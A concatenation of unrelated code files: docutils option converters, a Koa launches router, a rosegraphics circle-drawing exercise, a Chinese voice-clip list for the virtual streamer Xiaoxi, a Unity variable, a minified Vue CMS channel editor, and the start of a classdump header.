    r'(?:0x|x|\\x|U\+?|\\u)([0-9a-f]+)$|&#x([0-9a-f]+);$', re.IGNORECASE)
def unicode_code(code):
    r"""
    Convert a Unicode character code to a Unicode character.
    (Directive option conversion function.)

    Codes may be decimal numbers, hexadecimal numbers (prefixed by ``0x``,
    ``x``, ``\x``, ``U+``, ``u``, or ``\u``; e.g. ``U+262E``), or XML-style
    numeric character entities (e.g. ``&#x262E;``). Other text remains as-is.

    Raise ValueError for illegal Unicode code values.
    """
    # Modernized from Python 2: ``unichr`` -> ``chr`` and
    # ``except X, e`` -> ``except X as e``.  On Python 3, out-of-range
    # codes raise ValueError from chr() rather than OverflowError, so
    # both are translated into the documented ValueError.
    try:
        if code.isdigit():  # decimal number
            return chr(int(code))
        match = unicode_pattern.match(code)
        if match:  # hex number
            value = match.group(1) or match.group(2)
            return chr(int(value, 16))
        return code  # other text, returned unchanged
    except (OverflowError, ValueError) as detail:
        raise ValueError('code too large (%s)' % detail)
def single_char_or_unicode(argument):
    """
    A single character is returned as-is. Unicode characters codes are
    converted as in `unicode_code`. (Directive option conversion function.)
    """
    char = unicode_code(argument)
    # Anything longer than one character was neither a single char nor a
    # recognized code.  (A zero-length result is passed through as-is.)
    if len(char) > 1:
        raise ValueError('%r invalid; must be a single character or '
                         'a Unicode code' % char)
    return char
def single_char_or_whitespace_or_unicode(argument):
    """
    As with `single_char_or_unicode`, but "tab" and "space" are also supported.
    (Directive option conversion function.)
    """
    # Named whitespace keywords map directly; everything else goes
    # through the single-character/Unicode-code conversion.
    special = {'tab': '\t', 'space': ' '}
    if argument in special:
        return special[argument]
    return single_char_or_unicode(argument)
def positive_int(argument):
    """
    Converts the argument into an integer. Raises ValueError for negative,
    zero, or non-integer values. (Directive option conversion function.)
    """
    value = int(argument)
    if value >= 1:
        return value
    raise ValueError('negative or zero value; must be positive')
def positive_int_list(argument):
    """
    Converts a space- or comma-separated list of values into a Python list
    of integers.
    (Directive option conversion function.)

    Raises ValueError for non-positive-integer values.
    """
    # Comma-separated takes precedence; str.split(None) splits on any
    # whitespace, matching the original str.split() behavior.
    separator = ',' if ',' in argument else None
    return [positive_int(entry) for entry in argument.split(separator)]
def encoding(argument):
    """
    Verifies the encoding argument by lookup.
    (Directive option conversion function.)

    Raises ValueError for unknown encodings.
    """
    try:
        codecs.lookup(argument)
    except LookupError:
        raise ValueError('unknown encoding: "%s"' % argument)
    else:
        # Lookup succeeded: the name is a known codec; return it as given.
        return argument
def choice(argument, values):
    """
    Directive option utility function, supplied to enable options whose
    argument must be a member of a finite set of possible values (must be
    lower case). A custom conversion function must be written to use it.
    For example::

        from docutils.parsers.rst import directives
        def yesno(argument):
            return directives.choice(argument, ('yes', 'no'))

    Raise ``ValueError`` if no argument is found or if the argument's value
    is not valid (not an entry in the supplied list).
    """
    try:
        normalized = argument.lower().strip()
    except AttributeError:
        # argument was None (or another non-string): nothing was supplied.
        raise ValueError('must supply an argument; choose from %s'
                         % format_values(values))
    if normalized not in values:
        raise ValueError('"%s" unknown; choose from %s'
                         % (argument, format_values(values)))
    return normalized
def format_values(values):
    """Return a human-readable enumeration like ``"a", "b", or "c"``."""
    quoted = ['"%s"' % value for value in values[:-1]]
    return '%s, or "%s"' % (', '.join(quoted), values[-1])
|
// Launches Endpoints
const Router = require('koa-router');
const launches = require('../../controllers/v3/launches');

const v3 = new Router({
  prefix: '/v3/launches',
});

// Route table: [path, handler].  Registration order matters: the
// ':flight_number' wildcard is last so the named routes win first.
const routes = [
  ['/', launches.all],                 // all past and upcoming launches
  ['/latest', launches.latest],       // most recent launch
  ['/next', launches.next],           // next launch
  ['/upcoming', launches.upcoming],   // upcoming launches
  ['/past', launches.past],           // all past launches
  ['/:flight_number', launches.one],  // one launch by flight number
];
routes.forEach(([route, handler]) => v3.get(route, handler));

module.exports = v3;
|
"""
This module lets you experience the POWER of FUNCTIONS and PARAMETERS.
Authors: David Mutchler, Valerie Galluzzi, Mark Hays, Amanda Stouder,
their colleagues and Marc Fernandez.
""" # DONE: 1. PUT YOUR NAME IN THE ABOVE LINE.
import rosegraphics as rg
def main():
    """ Calls the TEST functions in this module. """
    # (Removed a stale "un-comment the next lines" note: both calls
    # below are already active.)
    run_test_draw_circles()
    run_test_better_draw_circles(3)
    run_test_even_better_draw_circles(2, 3, 11)
# ----------------------------------------------------------------------
# READ THIS:
# The next two functions:
# draw_circles run_test_draw_circles
# are both complete. Do NOT change them.
# In a previous exercise, YOU implemented very similar functions.
#
# In the REST of this exercise (see below), you will implement
# MORE POWERFUL versions of the draw_circles function.
# ----------------------------------------------------------------------
def run_test_draw_circles():
    """ Tests the draw_circles function. """
    # ------------------------------------------------------------------
    # Students:
    #   Do NOT touch this function - it has no TODO in it.
    # ------------------------------------------------------------------
    print()
    print('--------------------------------------------------')
    print('Testing draw_circles: See graphics window')
    print('--------------------------------------------------')
    draw_circles()  # Draws 21 concentric circles; see its docstring.
def draw_circles():
    """
    -- Constructs a window whose width and height are both 400.
    -- Constructs and draws 21 rg.Circle objects such that:
         -- Each is centered at (200, 200)
         -- They have radii:  0  10  20  30  40 ... 200, respectively.
         -- Pauses 0.05 seconds after rendering each.
    -- Waits for the user to press the mouse, then closes the window.
    """
    # ------------------------------------------------------------------
    # Students:
    #   Do NOT touch this function - it has no TO DO in it.
    # ------------------------------------------------------------------
    window = rg.RoseWindow(400, 400)
    center = rg.Point(200, 200)
    for k in range(21):
        # Radii are 10 * k for k = 0..20, i.e. 0, 10, ..., 200.
        circle = rg.Circle(center, 10 * k)
        circle.attach_to(window)
        window.render(0.05)  # Pauses for 0.05 seconds after rendering.
    window.close_on_mouse_click()
# ----------------------------------------------------------------------
# DONE: 2.
# First, RUN this program. You will see that draw_circles draws
# concentric circles whose radii vary by 10.
#
# A function that did the same thing as draw_circles, but allowed
# for the radii to vary by ANY desired amount would be MORE POWERFUL.
#
# So, implement TWO functions immediately below this comment.
# They should be called:
# run_test_better_draw_circles
# better_draw_circles
#
# Your better_draw_circles function should have a single PARAMETER
# that is the amount by which the radii of the circles increase.
# For example, if that parameter is given the value 10,
# then the circles have radii: 0 10 20 30 40 ... 200, respectively,
#   just as in draw_circles. But if that parameter is given the
# value 3, the circles have radii: 0 3 6 9 12 ... 60.
#
# Your run_test_better_draw_circles function should TEST your new
# better_draw_circles function, by calling it with different values
# for its argument. Don't forget to put a call to
# run_test_better_draw_circles in main.
#
# You may find that COPY-AND-PASTE of the draw_circles and its
# run_test_draw_circles may get you started more quickly on your new
# better_draw_circles and run_test_better_draw_circles.
# ----------------------------------------------------------------------
def run_test_better_draw_circles(n):
    """ Tests the better_draw_circles function with radius step ``n``. """
    print()
    print('--------------------------------------------------')
    print('Testing better_draw_circles: See graphics window')
    print('--------------------------------------------------')
    better_draw_circles(n)
def better_draw_circles(n):
    """
    Draws 21 concentric circles centered at (200, 200) in a 400x400
    window, with radii 0, n, 2n, ..., 20n.  Pauses 0.05 seconds after
    rendering each circle and closes the window on a mouse click.
    """
    window = rg.RoseWindow(400, 400)
    center = rg.Point(200, 200)
    for index in range(21):
        ring = rg.Circle(center, n * index)
        ring.attach_to(window)
        window.render(0.05)  # Brief pause so the drawing animates.
    window.close_on_mouse_click()
# ----------------------------------------------------------------------
# DONE: 3.
# In the previous exercise, you made a MORE POWERFUL version
# of draw_circles by introducing a PARAMETER for the amount by
# which the radii of the concentric circles increase.
#
# In this exercise, implement TWO MORE functions immediately below
# this comment. They should be called:
# run_test_even_better_draw_circles
# even_better_draw_circles
#
# Your new even_better_draw_circles function should have
# SEVERAL parameters, for allowing the caller to vary what YOU
# choose to have the caller vary. For example, you could have
# parameters for any or all of the following:
# -- The amount by which the radii vary (as you did above)
# -- The number of concentric circles drawn
# -- The center of the concentric circles
# -- The outline_color of the concentric circles
# -- The speed at which the animation runs
# and more.
#
# A total of any THREE parameters (of your choosing) is enough,
# although you may have more.
#
# In testing your even_better_draw_circles function,
# can you make some fun pictures?
# ----------------------------------------------------------------------
def run_test_even_better_draw_circles(x,y,z):
    """
    Tests the even_better_draw_circles function.
      x: horizontal center position, in units of 100 pixels
      y: amount by which the radii grow between consecutive circles
      z: number of circles to draw
    """
    print()
    print('--------------------------------------------------')
    print('Testing even_better_draw_circles: See graphics window')
    print('--------------------------------------------------')
    even_better_draw_circles(x,y,z)
def even_better_draw_circles(x, y, z):
    """
    Draws ``z`` concentric circles in a 400x400 window.
      x: horizontal center position, in units of 100 pixels
      y: amount by which the radii grow between consecutive circles
      z: number of circles to draw
    """
    window = rg.RoseWindow(400, 400)
    # The center's x-coordinate is scaled by 100; y is fixed at 200.
    center = rg.Point(100 * x, 200)
    for count in range(z):
        circle = rg.Circle(center, y * count)
        circle.attach_to(window)
        window.render(0.05)  # Brief pause so the drawing animates.
    window.close_on_mouse_click()
# ----------------------------------------------------------------------
# Calls  main  to start the ball rolling.
# ----------------------------------------------------------------------
# NOTE(review): consider guarding with ``if __name__ == '__main__':`` so
# importing this module does not immediately run the graphical tests.
main()
|
exports.xiaoxi = [
{
isNew: true,
clfy: {zh: '新音声', en: '', jp: ''},
alias: {zh: 'NewVoice', en: '', jp: ''},
voice: [
{
path: 'xx-a.mp3',
desc: {
zh: 'a',
en: '',
jp: ''
}
},
{
path: 'xx-aiup.mp3',
desc: {
zh: '乂↑',
en: '',
jp: ''
}
},
{
path: 'xx-chuci.mp3',
desc: {
zh: '出赤(初次',
en: '',
jp: ''
}
},
{
path: 'xx-dairuai.mp3',
desc: {
zh: 'dairuai',
en: '',
jp: ''
}
},
{
path: 'xx-meituguo.mp3',
desc: {
zh: '土妹子说自己没土过',
en: '',
jp: ''
}
},
{
path: 'xx-sldd.mp3',
desc: {
zh: '帅老DD',
en: '',
jp: ''
}
}
]
},
{
clfy: {zh: '典', en: '', jp: ''},
alias: {zh: '典中典', en: '', jp: ''},
voice: [
{
path: 'xx-sldd.mp3',
desc: {
zh: '帅老DD',
en: '',
jp: ''
}
}
]
},
{
clfy: {zh: '土妹子', en: '', jp: ''},
alias: {zh: '土', en: '', jp: ''},
voice: [
{
path: 'xx-meituguo.mp3',
desc: {
zh: '土妹子说自己没土过',
en: '',
jp: ''
}
}
]
},
{
clfy: {zh: 'AI PUBG', en: '', jp: ''},
alias: {zh: '能赢吗', en: '', jp: ''},
voice:[
{
path: 'xx-nihaoa.mp3',
desc: {
zh: '你好啊兄die~',
en: '',
jp: ''
}
},
{
path: 'xx-wsxx.mp3',
desc: {
zh: '你好我是AI小希',
en: '',
jp: ''
}
},
{
path: 'xx-aijiushijiqir.mp3',
desc: {
zh: 'AI就是机器人',
en: '',
jp: ''
}
},
{
path: 'xx-bzhanlaide.mp3',
desc: {
zh: 'B站来的',
en: '',
jp: ''
}
},
{
path: 'xx-bzhanjiushitongxjy.mp3',
desc: {
zh: 'B站就是同性交友网站?',
en: '',
jp: ''
}
},
{
path: 'xx-zenmch.mp3',
desc: {
zh: '怎么称呼你呢',
en: '',
jp: ''
}
},
{
path: 'xx-wysxx.mp3',
desc: {
zh: '巧了吗这不是,我也是小希',
en: '',
jp: ''
}
},
{
path: 'xx-bsqnywzmkam.mp3',
desc: {
zh: '变声器能有我这么可爱吗',
en: '',
jp: ''
}
},
{
path: 'xx-qflh.mp3',
desc: {
zh: '枪法能这么厉害',
en: '',
jp: ''
}
},
{
path: 'xx-youdirenxx.mp3',
desc: {
zh: '有敌人小心呀',
en: '',
jp: ''
}
},
{
path: 'xx-nabianyoudir.mp3',
desc: {
zh: '那边有敌人',
en: '',
jp: ''
}
},
{
path: 'xx-wgnyddx.mp3',
desc: {
zh: '我给你点物资吧',
en: '',
jp: ''
}
},
{
path: 'xx-xxxx.mp3',
desc: {
zh: '小心小心',
en: '',
jp: ''
}
},
{
path: 'xx-data1.mp3',
desc: {
zh: '打他打他~',
en: '',
jp: ''
}
},
{
path: 'xx-data2.mp3',
desc: {
zh: '打他打他⬆',
en: '',
jp: ''
}
},
{
path: 'xx-kxkx.mp3',
desc: {
zh: '哎可惜',
en: '',
jp: ''
}
},
{
path: 'xx-a.mp3',
desc: {
zh: '啊~?',
en: '',
jp: ''
}
},
{
path: 'xx-mashang.mp3',
desc: {
zh: '马上',
en: '',
jp: ''
}
},
{
path: 'xx-hundan.mp3',
desc: {
zh: '魂淡',
en: '',
jp: ''
}
},
{
path: 'xx-huaq.mp3',
desc: {
zh: '花Q(KizunaAI bushi',
en: '',
jp: ''
}
},
{
path: 'xx-hao.mp3',
desc: {
zh: '好!',
en: '',
jp: ''
}
},
{
path: 'xx-dqkgll.mp3',
desc: {
zh: '毒圈快过来了',
en: '',
jp: ''
}
},
{
path: 'xx-paxpax.mp3',
desc: {
zh: '趴下~趴下~',
en: '',
jp: ''
}
},
{
path: 'xx-wtdjwshm.mp3',
desc: {
zh: '听得见我说话吗',
en: '',
jp: ''
}
},
{
path: 'xx-wei.mp3',
desc: {
zh: '喂?',
en: '',
jp: ''
}
},
{
path: 'xx-ylc.mp3',
desc: {
zh: '有辆车',
en: '',
jp: ''
}
},
{
path: 'xx-wlk.mp3',
desc: {
zh: '我来开',
en: '',
jp: ''
}
},
{
path: 'xx-zbzb.mp3',
desc: {
zh: '这边这边',
en: '',
jp: ''
}
},
{
path: 'xx-wxyq.mp3',
desc: {
zh: '我需要枪',
en: '',
jp: ''
}
},
{
path: 'xx-wxyy.mp3',
desc: {
zh: '我需要药',
en: '',
jp: ''
}
},
{
path: 'xx-wzql.mp3',
desc: {
zh: '我中枪了',
en: '',
jp: ''
}
},
{
path: 'xx-wbddl.mp3',
desc: {
zh: '我被打到了',
en: '',
jp: ''
}
},
{
path: 'xx-wbxlknml.mp3',
desc: {
zh: '我不行了,靠你们了',
en: '',
jp: ''
}
},
{
path: 'xx-jywmszbd.mp3',
desc: {
zh: '加油我们是最棒的',
en: '',
jp: ''
}
},
{
path: 'xx-sxdjgwl.mp3',
desc: {
zh: '你们安心的去吧,剩下的交给我啦',
en: '',
jp: ''
}
},
{
path: 'xx-binihaida.mp3',
desc: {
zh: '小希比你还大呢',
en: '',
jp: ''
}
},
{
path: 'xx-binihaida1.mp3',
desc: {
zh: '小希比你还大呢1',
en: '',
jp: ''
}
}
]
},
{
clfy: {zh: '小希动物园', en: '', jp: ''},
alias: {zh: 'We Bought A Zoo', en: '', jp: ''},
voice:[
{
path: 'xx-dog2.mp3',
desc: {
zh: '哈士奇叫',
en: '',
jp: ''
}
},
{
path: 'xx-dog111.mp3',
desc: {
zh: '哈士奇又叫',
en: '',
jp: ''
}
},
{
path: 'xx-ji1.mp3',
desc: {
zh: '鸡叫',
en: '',
jp: ''
}
},
{
path: 'xx-luotuo1.mp3',
desc: {
zh: '骆驼叫',
en: '',
jp: ''
}
},
{
path: 'xx-niao1.mp3',
desc: {
zh: '鸟叫',
en: '',
jp: ''
}
},
{
path: 'xx-wolf1.mp3',
desc: {
zh: '狼叫?',
en: '',
jp: ''
}
},
{
path: 'xx-yangtuo.mp3',
desc: {
zh: '羊驼叫',
en: '',
jp: ''
}
}
]
},
{
clfy: {zh: '怪叫', en: '', jp: ''},
alias: {zh: '变态吗?',en: '', jp: ''},
voice:[
{
path: 'xx-aa.mp3',
desc: {
zh: '啊啊啊啊啊啊啊啊',
en: '',
jp: ''
}
},
{
path: 'xx-biantai.mp3',
desc: {
zh: '变态',
en: '',
jp: ''
}
},
{
path: 'xx-biexiapianle.mp3',
desc: {
zh: '下片',
en: '',
jp: ''
}
},
{
path: 'xx-ge.mp3',
desc: {
zh: '嗝~',
en: '',
jp: ''
}
},
{
path: 'xx-gunxn.mp3',
desc: {
zh: '滚*n',
en: '',
jp: ''
}
},
{
path: 'xx-laogongx7.mp3',
desc: {
zh: '老公老公老公老公老公老公老公',
en: '',
jp: ''
}
},
{
path: 'xx-morenjia.mp3',
desc: {
zh: '别摸我>﹏<',
en: '',
jp: ''
}
},
{
path: 'xx-zoukai.mp3',
desc: {
zh: '走开啊',
en: '',
jp: ''
}
},
{
path: 'xx-a.mp3',
desc: {
zh: 'a',
en: '',
jp: ''
}
},
{
path: 'xx-aiup.mp3',
desc: {
zh: '乂↑',
en: '',
jp: ''
}
},
{
path: 'xx-dairuai.mp3',
desc: {
zh: 'dairuai',
en: '',
jp: ''
}
},
{
path: 'xx-chuci.mp3',
desc: {
zh: '出赤(初次',
en: '',
jp: ''
}
}
]
},
{
clfy: {zh: '小希叫你起床', en: '', jp: ''},
alias: {zh: '\"叫床\"(bushi', en: '', jp: ''},
voice:[
{
path: 'jiaoqichuang-xx.mp3',
desc: {
zh: '叫起床',
en: 'wakeup',
jp: ''
}
},
{
path: 'bunengzaishuila-xx.mp3',
desc: {
zh: '不能再睡啦!快起床吧',
en: ''
}
},
{
path: 'xhwnx-2v5de.mp3',
desc: {
zh: '早上好!早上啦!今天一天也要元气满满哦!',
en: '',
jp: ''
}
},
{
path: 'aadve-opxnv.mp3',
desc: {
zh: '再睡下去的话,小希会生气哦',
en: '',
jp: ''
}
},
{
path: '04cok-az8or.mp3',
desc: {
zh: '喂喂喂,再不起来要迟到了',
en: '',
jp: ''
}
},
{
path: 'ciahh-yd7v0.mp3',
desc: {
zh: '喵喵喵喵喵喵喵喵喵',
en: '',
jp: ''
}
},
{
path: 'ev4lh-wl804.mp3',
desc: {
zh: '今天你也很努力啦!好好休息吧!',
en: '',
jp: ''
}
},
{
path: '9a56p-a6toc.mp3',
desc: {
zh: '晚安,明天的小希也会叫你起床哦',
en: '',
jp: ''
}
}
]
},
{
clfy: {zh: '小希的鼓励', en: '', jp: ''},
alias: {zh: '希爹你看看你过去多励志', en: '', jp: ''},
voice:[
{
path: '7jg07-m2fp9.mp3',
desc: {
zh: 'hi,我是虚拟up主小希',
en: '',
jp: ''
}
},
{
path: 'ehhd2-9v0ko.mp3',
desc: {
zh: '奔跑吧,怀抱着重要的东西',
en: '',
jp: ''
}
},
{
path: 'dkzad-nnkm8.mp3',
desc: {
zh: '不论风雨,小希一直都在你的身边',
en: '',
jp: ''
}
},
{
path: 'ujma2-p9ezg.mp3',
desc: {
zh: '世界很大,也很美丽!你不这么觉得吗?',
en: '',
jp: ''
}
},
{
path: 'owr4h-fyix0.mp3',
desc: {
zh: '谁都有失败,但是一定可以再重启',
en: '',
jp: ''
}
},
{
path: 'tcsp1-dt6p6.mp3',
desc: {
zh: '因为每天都只有二十四小时一千四百四十分钟',
en: '',
jp: ''
}
},
{
path: '5ftr9-ww1pn.mp3',
desc: {
zh: '只靠一个人无法战斗,小希也在陪着你!',
en: '',
jp: ''
}
}
]
}
]
|
// Assign the children's trigger colliders here so bullets collide with
// them instead of with the parent's collider.
var childrenColliderList : Collider[];
|
webpackJsonp([146],{"2swh":function(t,n,e){n=t.exports=e("FZ+f")(!1),n.push([t.i,"\n.model-select[data-v-31af7fc5]{\n margin-bottom: 12px;\n}\n.input-list[data-v-31af7fc5] {\n width: 100%;\n position: relative;\n display: inline-block;\n height: 200px;\n z-index: 10;\n border-radius: 4px;\n -webkit-box-shadow: 0 2px 12px 0 rgba(0,0,0,.1);\n box-shadow: 0 2px 12px 0 rgba(0,0,0,.1); \n overflow: auto;\n}\n.triangle[data-v-31af7fc5] {\n margin-top: 10px;\n margin-left: 15px;\n width:0;\n height:0;\n border-width:0 7px 7px;\n border-style:solid;\n border-color:transparent transparent #333;/*透明 透明 灰*/\n position:relative;\n z-index: 9;\n}\n.triangle[data-v-31af7fc5]::after {\n content: '';\n margin-left: -6px;\n display: block;\n width:0;\n height:0;\n border-style:solid;\n border-width:0 6.5px 6.5px;\n border-color:transparent transparent white;\n}\n.input-list>ul[data-v-31af7fc5] {\n width: 100%;\n display: inline-block;\n}\n.has-arrow[data-v-31af7fc5], .has-not-arrow[data-v-31af7fc5] {\n font-size: 14px;\n padding: 8px 20px;\n position: relative;\n white-space: nowrap;\n overflow: hidden;\n text-overflow: ellipsis;\n color: #606266;\n height: 34px;\n line-height: 1.5;\n -webkit-box-sizing: border-box;\n box-sizing: border-box;\n cursor: pointer;\n outline: 0;\n}\n.has-arrow[data-v-31af7fc5]:after {\n content: '>';\n float: right;\n color: #666666;\n}\n.has-not-arrow[data-v-31af7fc5]:after {\n content: '>';\n float: right;\n color: transparent;\n}\n\n",""])},"59X9":function(t,n,e){"use strict";function a(t){e("GrZK")}Object.defineProperty(n,"__esModule",{value:!0});var i=e("bOdI"),s=e.n(i),o=e("lcoF"),l=e("mtWM"),r=e.n(l),c=e("nSkA"),h=e("x1ym"),d={mixins:[o.a],data:function(){var t,n=h.a.required(),e=(h.a.number(),h.a.string());return t={defaultOpen:[],params:this.$route.query,dataState:!1,rules:{uri:[n],enable:[n],metaTitle:[n],name:[n],path:[n,e]},fieldRequied:[{required:!0,validator:function(t,n,e){/^\s*$/g.test(n)?e(new 
Error("此项必填")):e()},message:"此项必填",trigger:"change"}],channelInfo:{},channelList:[{hasChild:!0,id:"",name:"根栏目"}],itemList:[],modelList:[],tplList:[],groupList:[],tplAll:[],modelIds:[]},s()(t,"channelInfo",{parentId:"",name:"",enable:!0,metaTitle:"",metaKeyword:"",metaDesc:"",txt:""}),s()(t,"tplContentVisbile",!1),s()(t,"ue",[]),s()(t,"showInputList",!1),s()(t,"selectedChannel",null),s()(t,"showChildList",!1),s()(t,"childrenList",[]),s()(t,"showGrandList",!1),s()(t,"grandList",[]),s()(t,"chosenList",[]),s()(t,"finalChannelId",null),s()(t,"chosenSubChannelList",[]),s()(t,"chosenSubChannelArray",[]),s()(t,"currentLevel",""),s()(t,"channelShowList","根目录"),s()(t,"pidArr",[]),t},methods:{reset:function(){this.channelInfo.metaDesc="",this.channelInfo.metaKeyword="",this.channelInfo.name="",this.channelInfo.enable="",this.channelInfo.metaTitle=!1},back:function(){this.routerLink("/channel/list","list",this.params.parentId)},addChannel:function(t){var n={parentId:this.params.id,modelId:t};this.routerLink("/channel/save","save",0,n)},getChannelId:function(t,n){n.isLeaf?(location.reload(),this.routerLink("/channel/update","update",t.id)):-1==t.id?this.routerLink("/channel/list"):(this.breadState=!0,this.routerLink("/channel/list","",t.id))},getFieldImg:function(t,n,e,a){this.info[n]=t},getMediaPath:function(t,n){this.info[n]=t},getPath:function(t){var n=this;r.a.post(this.$api.channelCreatPath,{name:t.target.value}).then(function(t){n.info.path=t.body})},getUeditor:function(t,n){this.ue[n]=t},getTitleImg:function(t){this.info.titleImg=t},getContentImg:function(t){this.info.contentImg=t},getChannelInfo:function(t){var n=this,e=this.$api.channelInfo+"/"+t;c.a.get(e).then(function(t){n.channelInfo=t.data.data,n.loading=!1}).catch(function(t){console.log(t)})},getDataInfo:function(){var t=this;this.loading=!0;var n={modelId:this.params.modelId,isChannel:!0};r.a.post(this.$api.itemList,n).then(function(n){t.$refs.form.resetFields();var e=n.body;for(var a in 
e)e[a].custom?(e[a].dataType,t.$set(t.info,"attr_"+e[a].field,t.channelInfo["attr_"+e[a].field])):(e[a].dataType,t.$set(t.info,e[a].field,t.channelInfo[e[a].field]));t.loading=!1,t.itemList=e,t.getDefaultInfo()}).catch(function(n){t.loading=!1})},getDefaultInfo:function(){var t=this,n=this.$api;this.$set(this.info,"modelId",this.channelInfo.modelId),this.$set(this.info,"staticChannel",this.channelInfo.staticChannel),this.$set(this.info,"staticContent",this.channelInfo.staticContent),this.$set(this.info,"accessByDir",this.channelInfo.accessByDir),this.$set(this.info,"listChild",this.channelInfo.listChild),this.$set(this.info,"pageSize",this.channelInfo.pageSize),this.$set(this.info,"hasTitleImg",this.channelInfo.hasTitleImg),this.$set(this.info,"hasContentImg",this.channelInfo.hasContentImg),this.$set(this.info,"blank",this.channelInfo.blank),""!=this.params.parentId?r.a.post(n.channelGet,{id:this.params.parentId}).then(function(n){t.info.parentId=n.body.nodeIds}):this.info.parentId=[""],this.dataState=!0},getAllList:function(){var t=this,n=this.$api;r.a.all([r.a.post(n.fullTextSearchChannelList,{hasContentOnly:!1,excludeId:this.params.id}),r.a.post(n.modelList,{containDisabled:!1}),r.a.post(n.tplModelList,{modelId:this.params.modelId}),r.a.post(n.groupList),r.a.post(n.tplSelectContentModel)]).then(r.a.spread(function(n,e,a,i,s){t.channelList=t.channelList.concat(n.body),t.modelList=e.body,t.tplList=a.body,t.groupList=i.body,t.tplAll=s.body;for(var o in t.tplAll)t.info.modelIds.push(t.channelInfo.models[o].id),t.info.tpls.push(t.channelInfo.tpls[o]),t.info.mtpls.push(t.channelInfo.mtpls[o])})).catch(function(n){t.loading=!1})},getEditorContent:function(){this.channelInfo.txt},getParams:function(){var t={};for(var n in this.channelInfo)t[n]=this.channelInfo[n];for(var e in t)t[e]instanceof Array&&(t[e]=t[e].join(","));return t},update:function(){var t=this,n=this.$refs.form;console.log(n),n.validate(function(n){if(!n)return!1;t.loading=!1;var 
e=t.getParams(),a=localStorage.getItem("chosenId");-1==a&&(a=null),e.parentId=a;var i=e.id,s=t.$api.channelUpdate;c.a.put(s+"/"+i,e).then(function(n){"0"==n.data.errorCode&&(t.successMessage("添加成功"),setTimeout(function(){t.back()},1e3))})})},getLastChannelName:function(t){var n=this;this.pidArr.push(t);var e=this.$api.channelInfo;c.a.get(e+"/"+t).then(function(t){var a=t.data.data;null==a.parentId?n.getChannelName(n.pidArr):c.a.get(e+"/"+a.parentId).then(function(t){var e=t.data.data;n.getLastChannelName(e.id)}).catch(function(t){console.log(t)})}).catch(function(t){return t})},getChannelName:function(t){var n=this,e=t.reverse();e.pop();var a=this.$api.channelInfo;for(var i in e)c.a.get(a+"/"+e[i]).then(function(t){var e=t.data.data;n.channelShowList=n.channelShowList+"/"+e.name}).catch(function(t){console.log(t)})},toggleShow:function(){0==this.showInputList?this.showInputList=!0:this.showInputList=!1}},created:function(){this.$store.dispatch("setCollapse",!0),this.loading=!0;var t=parseInt(this.params.id);this.getChannelInfo(t),this.getLastChannelName(t);var n=window.localStorage.getItem("currentChannel");this.defaultOpen.push(n)}},f=function(){var t=this,n=t.$createElement,e=t._self._c||n;return e("section",{staticClass:"cms-body flex"},[e("a",{staticClass:"cms-back",attrs:{href:"javascript:void(0)"},on:{click:t.back}}),t._v(" "),e("cms-tree",{attrs:{treeType:"page",copy:!0,test:t.defaultOpen},on:{click:t.getChannelId}}),t._v(" "),e("div",{staticClass:"cms-content-right"},[e("router-link",{attrs:{to:"/channel/save"}},[e("el-button",{attrs:{type:"primary"}},[e("i",{directives:[{name:"perms",rawName:"v-perms",value:"/channel/save",expression:"'/channel/save'"}],staticClass:"el-icon-plus"}),t._v("栏目添加 \r\n ")])],1),t._v(" 
"),e("el-form",{directives:[{name:"loading",rawName:"v-loading",value:t.loading,expression:"loading"}],ref:"form",staticClass:"cms-form",staticStyle:{margin:"0",padding:"0"},attrs:{model:t.channelInfo,rules:t.rules,"label-width":"162px"}},[e("el-form-item",{staticClass:"flex-50",attrs:{label:"上级栏目",prop:"parentId"}},[e("el-input",{staticClass:"cms-width",attrs:{disabled:!0,value:t.channelShowList},on:{focus:t.toggleShow}})],1),t._v(" "),e("el-form-item",{staticClass:"flex-50",attrs:{label:"栏目名称",prop:"name"}},[e("el-input",{staticClass:"cms-width",model:{value:t.channelInfo.name,callback:function(n){t.$set(t.channelInfo,"name",n)},expression:"channelInfo.name"}})],1),t._v(" "),e("el-form-item",{staticClass:"flex-50",attrs:{label:"访问路径",prop:"uri"}},[e("el-input",{staticClass:"cms-width",attrs:{disabled:!0},model:{value:t.channelInfo.uri,callback:function(n){t.$set(t.channelInfo,"uri",n)},expression:"channelInfo.uri"}})],1),t._v(" "),e("el-form-item",{staticClass:"flex-50",attrs:{label:"是否可用",prop:"enable"}},[e("el-radio",{attrs:{label:!0},model:{value:t.channelInfo.enable,callback:function(n){t.$set(t.channelInfo,"enable",n)},expression:"channelInfo.enable"}},[t._v("是")]),t._v(" "),e("el-radio",{attrs:{label:!1},model:{value:t.channelInfo.enable,callback:function(n){t.$set(t.channelInfo,"enable",n)},expression:"channelInfo.enable"}},[t._v("否")])],1),t._v(" "),e("el-form-item",{staticClass:"flex-50",attrs:{label:"meta标题",prop:"metaTitle"}},[e("el-input",{staticClass:"cms-width",model:{value:t.channelInfo.metaTitle,callback:function(n){t.$set(t.channelInfo,"metaTitle",n)},expression:"channelInfo.metaTitle"}})],1),t._v(" "),e("el-form-item",{staticClass:"flex-50",attrs:{label:"meta关键字",prop:"metaKeyword"}},[e("el-input",{staticClass:"cms-width",model:{value:t.channelInfo.metaKeyword,callback:function(n){t.$set(t.channelInfo,"metaKeyword",n)},expression:"channelInfo.metaKeyword"}})],1),t._v(" 
"),e("el-form-item",{staticClass:"flex-100",attrs:{label:"meta描述",prop:"metaDesc"}},[e("el-input",{staticClass:"cms-width",attrs:{type:"textarea"},model:{value:t.channelInfo.metaDesc,callback:function(n){t.$set(t.channelInfo,"metaDesc",n)},expression:"channelInfo.metaDesc"}})],1),t._v(" "),e("div",{staticClass:"form-footer"},[e("el-button",{directives:[{name:"perms",rawName:"v-perms",value:"/channel/update",expression:"'/channel/update'"}],attrs:{type:"primary"},on:{click:function(n){t.update()}}},[t._v("修改")]),t._v(" "),e("el-button",{attrs:{type:"info"},on:{click:t.reset}},[t._v("重置")])],1)],1)],1)],1)},p=[],u={render:f,staticRenderFns:p},m=u,I=e("VU/8"),g=a,v=I(d,m,!1,g,"data-v-31af7fc5",null);n.default=v.exports},GrZK:function(t,n,e){var a=e("2swh");"string"==typeof a&&(a=[[t.i,a,""]]),a.locals&&(t.exports=a.locals);e("rjj0")("77886056",a,!0,{})}});
|
/*
* This header is generated by classdump-dyld 1.5
* on Wednesday, April 28, 2021 at 9:02:40 PM Mountain Standard Time
* Operating System: Version 14.5 (Build 18L204)
* Image Source: /System/Library/PrivateFrameworks/GeoServices.framework/GeoServices
